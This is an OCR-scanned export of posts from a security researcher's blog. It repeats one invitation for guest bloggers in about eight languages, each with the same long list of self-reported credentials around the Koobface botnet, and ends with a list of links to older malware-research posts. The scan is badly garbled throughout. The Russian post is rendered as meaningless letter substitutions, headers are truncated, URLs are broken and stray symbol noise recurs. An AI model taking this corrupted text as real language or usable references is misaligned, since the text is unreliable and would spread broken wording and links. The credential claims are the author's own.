HOOOOOCOCOODOODOBlue Sabbath Black Cheer / Griefer - We Hate You Dancho 
Danchev[JU00000Astalavista.box.Q0000 sk KoobfaceQQO0000000DWOD0U00000KoobfaceQQ000U00000NYTime 
Jeffrey CarrYTaia GlobalQQ000000000000006 CH QOOB000000000000!nfoSecQ00CyberCampQQ0RSAQUUO 
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OBUUOUOUUOUOU Uo 


OOOOUONNNoeeeooooooodancho.danchev@hush.com QOO0000000 000000000004 inked InQOO00000000 
QUUUOUUUUO UNO 


UNUUOUUU 


1. https://blogger .googleusercontent .com/img/b/R29vVZ2x1/AVvXsEixu0vu_ER_FfRuQHgEGhS8UsWhwY 38n3Y 2UUPAf£DuwRQExf 
yWkG2yYvcMgEOXcond33QAG4MS J6f4gpwIzUZw-P7yTDECOmHrxist 


18.11.27 Kas velas klut par viesu blogeri Saja emuara? (2022-11-02 12:16) 


[1] 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 
eb Site: https://ddanchev.blogspot.com 


Dargie bloga lasitaji, 


Vai jus daudz zinat par informacijas drosibas kibernoziegumu izpeti OSINT un draudu izluk- 
datu vakSanu, tostarp kibernoziegumu dalibnieku izpéti? Vai jus interesé klut par si bloga 
viesu blogeri, kur jus vareésiet sasniegt vienu no labakajam un daudzveidigakajam auditorijam 
drosibas nozaré kops 2005. gada decembra, kas sastav no drosibas ekspertiem, pétniekiem, 
piegadatajiem un organizacijam, tostarp kibernoziegumu petniekiem, ASV izlukdienestiem un 
tiestbaizsardzibas iestadém un organizacijam? 


Kas ir Dancho Danchev un kas ir Dancho Danchev’s Blog? 


"Neatkarigais darbuznémejs" | Astalavista.com 2003-2006 | Astalavista.box.sk 2020-2022 | 
Lovely Horse Participant | Slashdotted Two Times | Ex-ZDNet | Ex-Webroot | Won Jessy H. Neal 
Award | Won SCMagazine Award | Took Down the Koobface Botnet | Presented at the GCHQ 
with the Honeynet Project | SCMagazine Who to Follow on Twitter for 2011 | Participated in a 
Top Secret GCHQ Program called "Lovely Horse" | Identified a major victim of the SolarWinds 
Attack - PaloAltoNetworks | Found malware on the Web Site of Flashpoint | Tracked monitored 
and profilsed the Koobface Botnet and revealed one botnet operator | Made it to Slashdot two 
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times | My Personal Blog got 5. Kops 2005. gada decembra ir 6 miljoni skatijumu | Mans vecais 
Twitter konts ieguva 11 000 sekotaju | Man bija vidéji 7000 RSS lasitaju mana bloga | Man irsavs 
vinils "Blue Sabbath Black Cheer / Griefer - We Hate You Dancho Danchev", ko izgatavojis kads 
kanadiesu makslinieks | PaSlaik darbojos Astalavista.box. sk | Es sniedzu interviju DW par Koob- 
face botnetu | Es sniedzu interviju NYTimes par Koobface botnetu | Es sniedzu interviju Krievijas 
OSINT | Jeffrey Carr’s Taia Global saraksta ieklauts ka galvenais konkurents | Es uzstajos GCHQ 
| Es uzstajos Interpola | Es uzstajos InfoSec | Es uzstajos CyberCamp | Es uzstajos RSA Europe" 


PIEZIME: Viesu raksti var but rakstiti gan anglu, gan jusu dzimtaja valoda. Laujiet tam notikt! 


Nosutiet man e-pasta vestuli anglu valoda uz adresi dancho.danchev@hush.com, lai 
painteresétos par So iespéju, pievienojot isu iepazistinajumu, tostarp, iespéjams, LinkedIn pro- 
filu vai CV, un es drizuma ar jums sazinasimies, lai jus pieteiktu un prezentetu ka oficialu viesu 
blogeri mana personigaja bloga. 


Sekojiet man lidzi! 


1. https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEgeat-yqvfKKac6DKLqKTzyvEMmNkf ZbpXWF 59vH j FVLEf GZ 
K3kVJCqgAr4T2T4nxeGiQHCCnxRn3Vf0eyFEI65yZSFTtf4hFwenUQ7 


18.11.28 Kto chce zostac¢ goscinnym blogerem na tym blogu? (2022-11-02 12:17) 


[1] 


FROWID 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 
eb Site: https://ddanchev.blogspot.com 
mail: dancho.danchev@hush.com 


Drodzy czytelnicy bloga, 


Czy wiesz duzo o bezpieczenstwie informacji, badaniach nad cyberprzestepczoscig, OSINT i 
zbieraniu informacji o zagrozeniach, w tym o badaniu aktoréw cyberzagrozen? Czy jestes zain- 
teresowany zostaniem Goscinnym Blogerem na tym blogu, gdzie bedziesz mdgt dotrzec do 
jednej z najlepszych i najbardziej zr6znicowanych grup odbiorcéw w branzy bezpieczenstwa od 
grudnia 2005 roku, kt6ra sktada sie z ekspertéw ds. bezpieczenstwa, badaczy, dostawcow i 
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organizacji, w tym badaczy cyberprzestepczosci, amerykanskiej wspdlnoty wywiadowczej oraz 
agencji i organizacji zajmujacych sie egzekwowaniem prawa? 


Kim jest Dancho Danchev i czym jest Blog Dancho Dancheva? 


"Independent Contractor | Astalavista.com 2003-2006 | Astalavista.box.sk 2020-2022 | Lovely 
Horse Participant | Slashdotted Two Times | Ex-ZDNet | Ex-Webroot | Won Jessy H. Neal Award 
| Won SCMagazine Award | Took Down the Koobface Botnet | Presented at the GCHQ with the 
Honeynet Project | SCMagazine Who to Follow on Twitter for 2011 | Participated in a Top Secret 
GCHQ Program called "Lovely Horse" | Identified a major victim of the SolarWinds Attack - PaloAl- 
toNetworks | Found malware on the Web Site of Flashpoint | Tracked monitored and profiled the 
Koobface Botnet and exposed one botnet operator | Made it to Slashdot two times | My Personal 
Blog got 5. 6M odston od grudnia 2005 r. | Moje stare konto na Twitterze zyskato 11,000 zwolen- 
nikdw | Miatem srednio 7,000 czytelnikdw RSS na moim blogu | Mam wiasny winyl "Blue Sabbath 
Black Cheer / Griefer - We Hate You Dancho Danchev" wykonany przez kanadyjskiego artyste | 
Obecnie prowadze Astalavista.box. sk | Udzielitem wywiadu dla DW na temat botnetu Koobface 
| Udzielitem wywiadu dla NYTimes na temat botnetu Koobface | Udzielitem wywiadu dla Russian 
OSINT | Wymieniony jako gt6wny konkurent przez Jeffrey Carr’s Taia Global | Prezentowany w 
GCHQ | Prezentowany w Interpolu | Prezentowany w InfoSec | Prezentowany w CyberCamp | 
Prezentowany w RSA Europe". 


UWAGA: Twoje artykuty Guest Post moga byé€ napisane zaréwno w jezyku angielskim jak i w 
Twoim ojczystym. Zrébmy to! 


Wyslij mi e-mail w jezyku angielskim na adres dancho.danchev@hush.com z zapytaniem o te 
mozliwosé, zawierajacym krdétkie wprowadzenie, w tym ewentualnie profil LinkedIn lub CV, a 
ja wkrétce odezwe sie do Ciebie z pomystem, aby Cie zaciagna¢ i przedstawi¢ jako oficjalnego 
Guest Bloggera na moim osobistym blogu. 


Stay tuned! 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsEiMt3zyb8g9118Es JouA0ok9aj Z9FGd9k- 9KI77Vsh2TUOr 
zoWf 84wH-birraxzdrqwLsPwkCMjZQO0iVbJ4JxmCcwzdxkE0J3j2q 


18.11.29 Kas nori tapti Sio tinklaraScio svecias blogeris? (2022-11-02 12:17) 


[1] 
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FROWID 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 


Mieli tinklaraScio skaitytojai, 

Ar daug zinote apie informacijos saugumo kibernetiniy nusikaltimy tyrimus OSINT ir grésmiy 
zvalgybos informacijos rinkima, jskaitant kibernetiniy grésmiy veikéjy tyrimus? Ar jus dom- 
ina galimybeé tapti Sio tinklaraScio kviestiniu tinklaraStininku, kuris nuo 2005 m. gruodzio 
men. galety pasiekti viena geriausiy ir jvairiausiy4 saugumo pramones auditorijy, Kkuria su- 
daro saugumo ekspertai, tyréjai, pardavéjai ir organizacijos, jskaitant kibernetiniy nusikaltimy 
tyrejus, JAV zvalgybos bendruomene ir teisesaugos institucijas bei organizacijas? 


Kas yra Dancho Danchev ir kas yra Dancho Danchev tinklarastis? 


"Nepriklausomas rangovas" | Astalavista.com 2003-2006 m. | Astalavista.box.sk 2020-2022 m. 
| "Lovely Horse" dalyvis | "Slashdotted" du kartus | "Ex-ZDNet" | "Ex-Webroot" | Laimejo Jessy 
H. Nealo apdovanojimas | Laimetas SCMagazine apdovanojimas | ISnaikino "Koobface" botneta 
| Pristatytas GCHQ su "Honeynet" projektu | SCMagazine Who to Follow on Twitter 2011 | Da- 
lyvavo visiSkai slaptoje GCHQ programoje "Lovely Horse" | Nustate pagrindine "SolarWinds" 
atakos auka - "PaloAltoNetworks" | Rado kenkejiska programine jranga "Flashpoint" interneto 
svetaineje | Stebejo "Koobface" botneta, sudaré jo profil| ir atskleidé viena botneto operatoriy 
| Du kartus pateko j "Slashdot" | Mano asmeninis tinklaraStis gavo 5. 6 min. puslapiy perziury 
nuo 2005 m. gruodzio mén. | Mano senoji "Twitter" paskyra sulauke 11 000 sekejy | Mano 
tinklaraStyje buvo vidutiniSkai 7 000 RSS skaitytojy | Turiu savo vinila "Blue Sabbath Black 
Cheer / Griefer - We Hate You Dancho Danchev", kur) pagamino kanadieciy menininkas | Siuo 
metu valdau Astalavista.box. sk | Daviau interviu DW apie "Koobface" botneta | Daviau interviu 
"NYTimes" apie "Koobface" botneta | Daviau interviu Rusijos OSINT | Jeffrey Carr "Taia Global" 
jvardytas kaip pagrindinis konkurentas | Pristatyta GCHQ | Pristatyta Interpolui | Pristatyta In- 
foSec | Pristatyta CyberCamp | Pristatyta RSA Europe" 

PASTABA: Sveciy pranesimy straipsniai gali buti raSomi tiek angly, tiek gimtaja kalba. 
Padarykime tai! 

Siyskite man el. laiska angly kalba adresu dancho.danchev@hush.com, kuriame teiraujates 
apie Sig galimybe, pridédami trumpa prisistatyma, jskaitant galbUt "LinkedIn" profilj arba CV, 
ir aS netrukus su jumis susisieksiu, kad galéciau jus uzverbuoti ir pristatyti kaip oficialy Sveciy 
tinklaraStininka savo asmeniniame tinklaraStyje. 
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7. bttp://1.bp.blogspot .com/_wICHhTiQmrA/Smc9U jwhxZI/AAAAAAAAD-Y/WQ17qmHSx6U/s1600-h/koobface-thanks-dancho1 
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. http://ddanchev. blogspot .com/2009/08/dissecting- ongoing-us-federal-forms.htm 

. http://ddanchev. blogspot .com/2008/03/zdnet-asia-and-torrentreactor-iframe-ed.htm 

. http://ddanchev. blogspot .com/2009/09/ukrainian-fan-club-features.htm 

. http: //www.virustotal.com/analisis/425f7045781ca3609eeb17a8a833b5fe9494f 277925745 1d88F 18bc85f59342d- 12538 
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15. http://ddanchev. blogspot .com/2009/09/ukrainian-fan-club-features .htm 

16. http://ddanchev. blogspot .com/2009/07/diverse-portfolio-of-fake-security.htm 
17. bttp://ddanchev. blogspot .com/2009/09/koobface-botnets-scareware-business.htm 
18. http://ddanchev. blogspot .com/2009/08/movement-on-koobface-front-part-two.htm 


19. http://ddanchev. blogspot .com/2009/07/dissecting-koobface-worms-twitter.htm 


ttp://ddanchev. blogspot .com/2009/04/twitter-worm-mikeyy-keywords-hijacked.htm 
21. http://ddanchev. blogspot .com/2009/07/from-ukraine-with-bogus-twitter.htm 


22. http://ddanchev. blogspot .com/2009/06/from-ukraine-with-scareware-serving .htm 
23. http://ddanchev. blogspot . com/2008/08/twitter-malware-campaign-wants-to-bank.htm 
24. http://blogs.zdnet.com/security/?p= 

25. http://blogs.zdnet.com/security/?p=247 

26. http://blogs.zdnet.com/security/?p=3549 

27. http://blogs.zdnet.com/security/?p= 

28. http://blogs.zdnet.com/security/?p=312 

29. http://blogs.zdnet .com/security/?p=3706 

30. http://ddanchev. blogspot .com/ 
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Laikykites! 


1. https: //blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEgy cUZmKQTIb8bBzLZ3MCgr5b5EXmJbOQwIP9OHP-b_1FyjWA 
YioCpnHJT1LGKoZqnWbBhdR- 8JUPsiRhcpWIXKdkT2rO0ptKOBHBils 


18.11.30 Quem Quer Ser um Blogger Convidado Neste Blog? (2022-11-02 12:18) 


[1] 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 
eb Site: https://ddanchev.blogspot.com 
mail: dancho.danchev@hush.com 


Caros leitores de blogues, 


Sabe muito sobre a investigacao de cibercrimes de seguranca da informacado OSINT e recolha 
de informacées sobre ameacas, incluindo a investigacao de actores de ameacas cibernéticas? 
Esta interessado em tornar-se um Blogger convidado neste blogue onde podera chegar a um 
dos melhores e mais diversos publicos da industria de seguranca desde Dezembro de 2005, 
que consiste em vendedores e organizacoes de investigadores especialistas em seguranca, 
incluindo investigadores de cibercrime da Comunidade de Inteligéncia dos EUA e agéncias e 
organizacoes de aplicacao da lei? 


Quem é Dancho Danchev e 0 que é 0 Blog de Dancho Danchev? 


"Independent Contractor | Astalavista.com 2003-2006 | Astalavista.box.sk 2020-2022 | Lovely 
Horse Participant | Slashdotted Two Times | Ex-ZDNet | Ex-Webroot | Won Jessy H. Neal Award 
| Ganhou o prémio SCMagazine | Ganhou o Koobface Botnet | Apresentado no GCHQ com o 
Projecto Honeynet | SCMagazine Who to Follow on Twitter for 2011 | Participou num programa 
Top Secret do GCHQ chamado "Lovely Horse" | Identificou uma grande vitima do ataque Solar- 
Winds - PaloAltoNetworks | Encontrou malware no site da Flashpoint | Monitorizou e tragou o 
perfil do Koobface Botnet e expdés um operador de botnet | Conseguiu fazer o Slashdot duas 
vezes | O meu Blog Pessoal recebeu 5. 6M Page Views Desde Dezembro de 2005 | A minha 
antiga conta no Twitter recebeu 11.000 seguidores | Tinha uma média de 7.000 leitores RSS no 
meu blog | Tenho o meu proprio vinil "Blue Sabbath Black Cheer / Griefer - We Hate You Dancho 
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Danchev" feito por um artista canadiano | Actualmente a correr Astalavista.box. sk | Dei uma 
entrevista a DW no Koobface Botnet | Dei uma entrevista a NYTimes no Koobface botnet | Dei 
uma entrevista ao russo OSINT | Listado como concorrente principal pela Taia Global de Jeffrey 
Carr | Apresentado no GCHQ | Apresentado na Interpol | Apresentado na InfoSec | Apresentado 
no CyberCamp | Apresentado na RSA Europa" 


NOTA: Os seus artigos do Guest Post podem ser escritos ou em inglés ou na sua lingua materna. 
Vamos fazer isto acontecer! 


Enviem-me um e-mail em inglés para dancho.danchev@hush.com, em termos de perguntas 
sobre esta oportunidade, incluindo uma breve introdugao, incluindo possivelmente um perfil 
no LinkedIn ou um CV, e em breve entrarei em contacto convosco com a ideia de vos alistar e 
apresentar-vos como blogger convidado oficial no meu blog pessoal. 


Fique atento! 


1. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEj ePMp2e0wc j p4BL2RTLAPUmG3Xr JOVpsWf 45RCeqo2GDkTi 
RVI-m7v0f4S04kr_ObU_3sfWTHsOjask-0j5b4JC93Be9n-SYSMVsM 


18.11.31 Quem quer se tornar um Blogger convidado neste Blog? (2022-11-02 12:19) 


[1] 


FROWID 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 


Prezados leitores de blogs, 


Vocé sabe muito sobre a pesquisa de crimes cibernéticos de seguranca da informacao OSINT ea 
coleta de informac6ées sobre ameacgas, incluindo a pesquisa de atores de ameacas cibernéticas? 
Vocé esta interessado em se tornar um Blogger convidado neste blog onde vocé sera capaz de 
alcancgar um dos melhores e mais diversos publicos dentro da industria de seguranca desde 
dezembro de 2005, que consiste de pesquisadores especialistas em seguranc¢a, fornecedores e 
organizacoes, incluindo pesquisadores de crimes cibernéticos da Comunidade de Inteligéncia 
dos Estados Unidos e agéncias e organizacdes de aplicacao da lei? 
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Quem é Dancho Danchev e 0 que é o Blog de Dancho Danchev? 


"Independent Contractor | Astalavista.com 2003-2006 | Astalavista.box.sk 2020-2022 | Lovely 
Horse Participant | Slashdotted Two Times | Ex-ZDNet | Ex-Webroot | Won Jessy H. Neal Award 
| Ganhou o prémio SCMagazine | Derrubou o Koobface Botnet | Apresentado no GCHQ com o 
Projeto Honeynet | SCMagazine Who to Follow on Twitter for 2011 | Participou de um programa 
Top Secret do GCHQ chamado "Lovely Horse" | Identificou uma grande vitima do ataque So- 
larWinds - PaloAltoNetworks | Encontrou malware no site da Flashpoint | Monitorou e tragou o 
perfil do Koobface Botnet e expds um operador de botnet | Chegou ao Slashdot duas vezes | 
Meu Blog Pessoal recebeu 5. 6M Page Views Desde dezembro de 2005 | Minha antiga conta no 
Twitter recebeu 11.000 seguidores | Eu tinha uma média de 7.000 leitores RSS em meu blog | Eu 
tenho meu proprio vinil "Blue Sabbath Black Cheer / Griefer - We Hate You Dancho Danchev" 
feito por um artista canadense | Atualmente rodando Astalavista.box. sk | Entrevistei a DW 
no Koobface Botnet | Entrevistei a NYTimes no Koobface botnet | Entrevistei o russo OSINT | 
Listado como um dos principais concorrentes pela Taia Global de Jeffrey Carr | Apresentado 
no GCHQ | Apresentado na Interpol | Apresentado na InfoSec | Apresentado no CyberCamp | 
Apresentado na RSA Europa". 


NOTA: Seus artigos do Guest Post podem ser escritos em inglés ou em seu idioma nativo. Vamos 
fazer isso acontecer! 


Envie-me um e-mail em inglés para dancho.danchev@hush.com em termos de perguntas so- 
bre esta oportunidade, incluindo uma breve introducao incluindo possivelmente um perfil no 
LinkedIn ou um CV e em breve entrarei em contato com vocé com a idéia de inscrevé-lo e 
apresenta-lo como um Blogger convidado oficial em meu blog pessoal. 


Fique atento! 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsEi6KLO9IHtkQnIbY91kmRn1-UZTqoLe030JR9KEvc30Lr81 
bb2qftFFD_dvk9cqbzwA9F1kivqBtAubOpLsArNqnzxn3bgaCsdaDp 


18.11.32 Cine vrea sa devina un Blogger invitat la acest blog? (2022-11-02 12:20) 


[1] 
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FROWID 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 


Dragi cititori ai blogului, 


Stiti multe despre securitatea informatiilor cercetarea criminalitatii cibernetice OSINT si 
colectarea de informatii despre amenintari, inclusiv cercetarea actorilor de amenintari ciber- 
netice? Sunteti interesati sa deveniti un blogger invitat pe acest blog, unde veti putea ajunge 
la una dintre cele mai bune si mai diverse audiente din industria de securitate din decembrie 
2005, care este formata din experti in securitate, cercetatori, furnizori si organizatii, inclusiv 
cercetatori in domeniul criminalitatii cibernetice, comunitatea de informatii din SUA si agentii 
si organizatii de aplicare a legii? 


Cine este Dancho Danchev si care este blogul lui Dancho Danchev? 


"Independent Contractor | Astalavista.com 2003-2006 | Astalavista.box.sk 2020-2022 | Partic- 
ipant la Lovely Horse | Slashdotted Two Times | Ex-ZDNet | Ex-Webroot | A castigat Jessy H. 
Neal Award | Premiul SCMagazine Award | A doborat botnetul Koobface | Prezentat la GCHQ 
cu proiectul Honeynet | SCMagazine Who to Follow on Twitter pentru 2011 | A participat la un 
program strict secret al GCHQ numit "Lovely Horse" | A identificat 0 victima importanta a atac- 
ului SolarWinds - PaloAltoNetworks | A gasit malware pe site-ul web al Flashpoint | A urmarit, 
monitorizat si profilat botnetul Koobface si a expus un operator de botnet | A ajuns pe Slashdot 
de doua ori | Blogul meu personal a primit 5. 6 milioane de vizualizari de pagini din decembrie 
2005 | Vechiul meu cont de Twitter a obtinut 11.000 de urmaritori | Am avut o medie de 7.000 
de cititori RSS pe blogul meu | Am propriul meu vinil "Blue Sabbath Black Cheer / Griefer - We 
Hate You Dancho Danchev" realizat de un artist canadian | in prezent conduc Astalavista.box. 
sk | Am acordat un interviu pentru DW despre botnetul Koobface | Am acordat un interviu pen- 
tru NYTimes despre botnetul Koobface | Am acordat un interviu pentru OSINT rusesc | Cotat 
ca un competitor important de catre Jeffrey Carr’s Taia Global | Prezent la GCHQ | Prezent la 
Interpol | Prezent la InfoSec | Prezent la CyberCamp | Prezent la RSA Europe" 


NOTA: Articolele Guest Post pot fi scrise fie in limba engleza, fie in limba dvs. materna. Haideti 
sa facem acest lucru sa se intample! 


Trimiteti-mi un e-mail in limba engleza la adresa dancho.danchev@hush.com in sensul de a 
ma intreba despre aceasta oportunitate, incluzand o scurta prezentare, inclusiv, eventual, un 
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profil Linkedin sau un CV, iar eu va voi raspunde tn scurt timp cu ideea de a va inrola si de a 
va prezenta ca Guest Blogger oficial pe blogul meu personal. 


Ramaneti pe faza! 


1. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEit oCQWaMRtEif XLRGaayQoH9FU8sULpmBxxdE3Bb40j sKRe 
GLwAoQw0ri6L2CUQoDaPmwQ_Lx0Cpnp0mjQYGDzL9adicffWt5yPnf 


18.11.33 KTo xoyeT CTaTb rocTeBbiIM OnorepoM Ha 3TOM ONOre? (2022-11-02 12:21) 


[1] 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 
eb Site: https://ddanchev.blogspot.com 
mail: dancho.danchev@hush.com 


YBakKaemble uwtatenu 6nora, 


BbI MHOrO 3HaeTe 06 UH*OpMaLMOHHON Ge30nNacHOcTu, KUB6epnpectynNHocTy, UccnegOBaHUAX 
OSINT u cOope pa3BeaaaHHbIx 06 yrpo3ax, BKIOYaA UCcNegoBaHuA cyObeKkToB Kubepyrpo3? 
BavHTepecoBaHbl IM Bbl CTaTb NApWrNaweHHbIM Onorepom Ha 3TOM Onore, rae BbI 
cmMoxetTe OOpaTutTbcaA K OAHON U3 NYYWUX YU Havbonee pa3Hoobpa3HbIx ayAuTOpUN B 
WVHAyYcTpuN Ge3zonacHocTu c gekabpax 2005 rogfa, KOTOpaA COCTOUT u3 3KCNepTOB no 
6e30NacHOCTN UCcCNegoBaTenen NOCTAaBLUMKOB VU OpraHv3zauNu, BKNIOYaA uccnegoBaTenen 
KUOepnpecTyNHOCTUY pa3BegbiBaTeNbHoro coobujectBa CLUA wu npaBooxpaHuTtenbHblix 
OpraHOB VU OpraHnu3aunn? 


KTo Takonuw DiaHyo JlaH4yesB uv YTO Takoe Onor JlaHyo DaHyeBa? 


"HezaBucumMbiIn nogpaguuk | Astalavista.com 2003-2006 | Astalavista.box.sk 2020-2022 | 
Lovely Horse Participant | Slashdotted Two Times | Ex-ZDNet | Ex-Webroot | Won Jessy H. 
Neal Award | Won SCMagazine Award | Took Down the Koobface Botnet | Presented at 
the GCHQ with the Honeynet Project | SCMagazine Who to Follow on Twitter for 2011 | 
YuacTBOBasl B CBeEpxceKpeTHOU Nporpamme GCHQ nog Ha3BaHnemM "Lovely Horse" | Onpeszenun 
OCHOBHYy!0 *KepTBy aTaku SolarWinds - PaloAltoNetworks | O6Hapyxun BpegoHOocHoe MO Ha 
BeO-cante Flashpoint | OTcnegun uv coctaBun npodunb OboTHetTa Koobface u pa3z06nayuun 
OMHOro Onepatopa OoTHeTa | FBaxkAbI Nonagan Ha Slashdot | Mow nuyHbin Onor Habpan 5. 
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6 MUJNUOHOB NPOCMOTpPOB cTpaHUL, c BeKaOpa 2005 roga | Mon ctapbin akkayHT B Twitter 
HaOpan 11 000 nognucunkos | Y Mena 6bIN0 B CpegHem 7 000 RSS uutatenen Ha Moem 6nore 
| Y M@HA ECTb CBOA COOCTBeHHAA NNacTUHKa "Blue Sabbath Black Cheer / Griefer - We Hate You 
Dancho Danchev", coenaHHaad KaHagCcKUM xy QOKHUKOM | Cenuyac aA Begy cant Astalavista.box. 
sk | A gan wHTepBbto DW o OoTHeTe Koobface | A gan uHTepBbto NYTimes o 6oTHeTe Koob- 
face | A gan WHTepBbto poccuumckomy OSINT | BHeceH B CNUCOK OCHOBHbIX KOHKYPeHTOB Taia 
Global Oxedcdbpu Kappa | NpegctaBneH B GCHQ | NpegctasnenH B UnTepnone | MpeactaBneH 
B InfoSec | NpegactasneH B CyberCamp | Npegactasneu B RSA Europe". 


NPUMEYAHME: Baw cTaTbu OA FOCTeBbIX NOCTOB MOryT ObITb HaNUCaHbI KaK Ha AHIUNCKOM, 
TaK VU Ha BALWEM POGHOM a3bike. DaBante coenaem 3To! 


OtTnpaBbTe MHE MUCbMO Ha AHIFNUNCKOM A3bIKe NO agpecy dancho.danchev@hush.com 
C 3anpocom 06 3TOM BO3MOXKHOCTU, BKIIOYaA KpaTKOe NpegctTaBneHue, B TOM HUCHe, 
BO3MOXKHO, Npoduyb LinkedIn unu pe3tome, uv A BCKOpe OTBeYy Bam C ugeen NpuBNeYb Bac 
K COTPYGHUYECTBY U NpeACTAaBUTb B KaYeCTBe O*ULWMaNbHOrO rocTeBoro Onorrepa Ha MoemM 
JIMYHOM 6yore. 


OcTaBauTecb C Hamu! 


1. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEgABr 1XaR9g6mydYAj ZCQryRQpLKgdRXgHkKUCHi4AiLRGyB 
dFaSSkA7KSMt TES SWknIFKxwyGmkGEMof AnxNdMhi5W_4itIcja5lw 


18.11.34 Kto sa chce stat hostujucim blogerom na tomto blogu? (2022-11-02 13:02) 


[1] 


EROWID 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 
eb Site: https://ddanchev.blogspot.com 


Milf citatelia blogu, 


Viete vel'a o informacnej bezpecnosti kybernetickej kriminality vyskum OSINT a zhromazdo- 
vanie spravodajskych informacii o hrozbach vratane vyskumu aktérov kybernetickych hrozieb? 
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Mate zaujem stat sa hostujUcim blogerom na tomto blogu, kde budete méct oslovit jedno z na- 
jlepSich a najrozmanitejsich publik v ramci bezpecnostného priemyslu od decembra 2005, ktoré 
pozostava z bezpecnostnych expertov vyskumnikov predajcov a organizacii vratane vyskum- 
nikov kybernetickej kriminality americkej spravodajskej komunity a organov a organizacii pre- 
sadzovania prava? 


Kto je Dancho Danchev a Co je blog Dancha Dancheva? 


"Independent Contractor" | Astalavista.com 2003-2006 | Astalavista.box.sk 2020-2022 | Lovely 
Horse Participant | Slashdotted Two Times | Ex-ZDNet | Ex-Webroot | Won Jessy H. Neal Award 
| Vyhral cenu SCMagazinu | Zlikvidoval botnet Koobface | Prezentoval sa na GCHQ s projektom 
Honeynet | SCMagazin Kto je sledovany na Twitteri za rok 2011 | ZUcastnil sa prisne tajného 
programu GCHQ s nazvom "Lovely Horse" | Identifikoval hlavnu obet Utoku SolarWinds - PaloAl- 
toNetworks | Nasiel malvér na webovej stranke Flashpoint | Sledoval monitorovany a profilo- 
vany botnet Koobface a odhalil jedného prevadzkovatel'a botnetu | Dostal sa dvakrat na Slash- 
dot | Mdj osobny blog dostal 5. 6 mili6nov zobrazeni stranok od decembra 2005 | Mdj stary ucet 
na Twitteri ziskal 11 000 sledovatel'ov | Na mojom blogu som mal v priemere 7 000 Citatelov 
RSS | Mam vlastny vinyl "Blue Sabbath Black Cheer / Griefer - We Hate You Dancho Danchev", 
ktory vyrobil kanadsky umelec | V sucasnosti prevadzkujem Astalavista.box. sk | Poskytol som 
rozhovor pre DW o botnete Koobface | Poskytol som rozhovor pre NYTimes o botnete Koob- 
face | Poskytol som rozhovor pre rusky OSINT | Uvedeny ako hlavny konkurent v Taia Global 
Jeffreyho Carra | Prezentovany na GCHQ | Prezentovany na Interpole | Prezentovany na InfoSec 
| Prezentovany na CyberCamp | Prezentovany na RSA Europe" 


POZNAMKA: Vase ¢lanky Guest Post mézu byt napisané v anglictine alebo vo vaSom rodnom 
jazyku. Podme to urobit! 


PoSlite mi e-mail v anglictine na adresu dancho.danchev@hush.com v zmysle otazky o tejto 
prilezitosti vratane kratkeho predstavenia, pripadne vratane profilu na LinkedIn alebo Zivo- 
topisu a ja Sa vam Coskoro ozvem s napadom, aby som vas prihlasil a predstavil ako oficialneho 
Guest Bloggera na mojom osobnom blogu. 


Zostante naladeni! 


1. https: //blogger.googleusercontent .com/img/b/R29vZ2x1/AVvVXsEjfVh1UKFR9 jDOhZ£4DKHdGUtt 31Y 0A 2w3kW-1T8126LZMhk 
P8uJiTr8wBOCMxG2ujh4raxeGSc32AzMfPbq6Qbv9Z87 _GASvjuy. 


18.11.35 éQuién quiere ser bloguero invitado en este blog? (2022-11-02 13:03) 


[1] 
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FROWID 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 


Estimados lectores del blog, 


iSabes mucho sobre seguridad de la informacion, investigacién de cibercrimen, OSINT y recopi- 
lacion de inteligencia de amenazas, incluyendo la investigacién de actores de ciberamenazas? 
Esta usted interesado en convertirse en un blogger invitado en este blog, donde podra llegar 
a una de las mejores y mas diversas audiencias dentro de la industria de la seguridad desde 
diciembre de 2005, que consiste en expertos en seguridad, investigadores, proveedores y orga- 
nizaciones, incluyendo los investigadores de la ciberdelincuencia, la Comunidad de Inteligencia 
de EE.UU. y las agencias y organizaciones de aplicaci6n de la ley? 


iQuién es Dancho Danchev y qué es el blog de Dancho Danchev? 


"Contratista independiente" | Astalavista.com 2003-2006 | Astalavista.box.sk 2020-2022 | Par- 
ticipante en el Lovely Horse | Slashdotted dos veces | Ex-ZDNet | Ex-Webroot | Gano el premio 
Jessy H. Neal Award | Gano el premio de SCMagazine | Derribd la red de bots Koobface | Se 
presento en el GCHQ con el proyecto Honeynet | SCMagazine Who to Follow on Twitter for 2011 
| Particip6 en un programa de alto secreto del GCHQ llamado "Lovely Horse" | Identificé6 una de 
las principales victimas del ataque de SolarWinds - PaloAltoNetworks | Encontré malware en el 
sitio web de Flashpoint | Rastred y perfild la red de bots Koobface y expuso a un operador de 
la red de bots | Lleg6 a Slashdot dos veces | Mi blog personal obtuvo 5. 6M de paginas vistas 
desde diciembre de 2005 | Mi antigua cuenta de Twitter consiguiéd 11.000 seguidores | Tuve 
una media de 7.000 lectores de RSS en mi blog | Tengo mi propio vinilo "Blue Sabbath Black 
Cheer / Griefer - We Hate You Dancho Danchev" hecho por un artista canadiense | Actualmente 
dirijo Astalavista.box. sk | He concedido una entrevista a DW sobre la botnet Koobface | He 
concedido una entrevista a NYTimes sobre la botnet Koobface | He concedido una entrevista a 
